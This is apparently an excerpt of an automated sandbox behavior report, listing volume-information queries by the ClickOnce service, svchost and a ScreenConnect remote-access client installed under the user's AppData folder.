                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Windows.dll VolumeInformation
